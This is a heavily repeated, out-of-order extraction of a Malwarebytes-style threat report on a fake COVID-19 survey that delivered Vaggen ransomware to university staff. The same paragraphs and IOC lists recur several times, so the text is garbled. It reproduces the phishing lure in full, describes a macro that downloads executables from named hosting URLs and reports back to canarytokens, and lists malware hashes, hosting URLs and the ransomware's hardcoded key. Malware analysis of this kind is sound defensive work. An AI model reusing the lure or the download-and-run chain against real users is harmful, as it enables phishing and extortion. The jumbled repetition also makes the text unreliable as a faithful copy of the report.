3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 989 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 990 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 991 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 992 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 993 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 994 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 995 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 996 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 997 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 998 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 999 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1000 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1001 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1002 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1003 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1004 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1005 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1006 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1007 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1008 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1009 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1010 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1011 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1012 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1013 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1014 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1015 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1016 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1017 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1018 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, 